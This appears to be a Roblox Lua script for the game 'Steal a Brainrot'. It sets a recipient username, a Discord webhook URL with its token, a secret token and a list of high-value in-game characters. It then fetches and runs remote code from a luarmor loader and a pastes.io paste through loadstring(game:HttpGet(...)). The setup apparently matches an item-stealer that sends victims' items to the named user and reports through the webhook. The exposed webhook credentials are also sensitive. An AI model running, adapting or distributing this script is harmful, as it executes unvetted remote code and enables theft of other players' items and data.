getgenv().User = "2AMDredan"

getgenv().Webhook = "https://discord.com/api/webhooks/1479267056926068910/2rqeNdsaMbyS73mDY0ZfoYoV112xTCjmuZzi96rxCnjbCdkeHLESg06Z3H1tA53EkWLR"

getgenv().SecretToken = "41b34d8f-d816-4ed7-aaec-427e4bee61ca"

getgenv().Brainrots = {
  "Strawberry Elephant",
  "Meowl",
  "Skibidi Toilet",
  "Headless Horseman",
  "Hydra Dragon Cannelloni",
  "Dragon Cannelloni",
  "Dragon Gingerini",
  "La Supreme Combinasion",
  "Cerberus",
  "Popcuru and Fizzuru",
  "Rosey and Teddy",
  "Capitano Moby",
  "Cooki and Milki",
  "Burguro And Fryuro",
  "Ketupat Bros",
  "La Casa Boo",
  "Spooky and Pumpky",
  "La Secret Combinasion",
  "Garama and Madundung",
  "Love Love Bear",
  "Celestial Pegasus",
  "La Food Combinasion",
  "Spaghetti Tualetti"
}

task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/808f4ad4ebff475c57ce61ea39e41e23.lua"))()
end)

task.spawn(function()
loadstring(game:HttpGet("https://pastes.io/raw/v100-https-81886"))()
end)
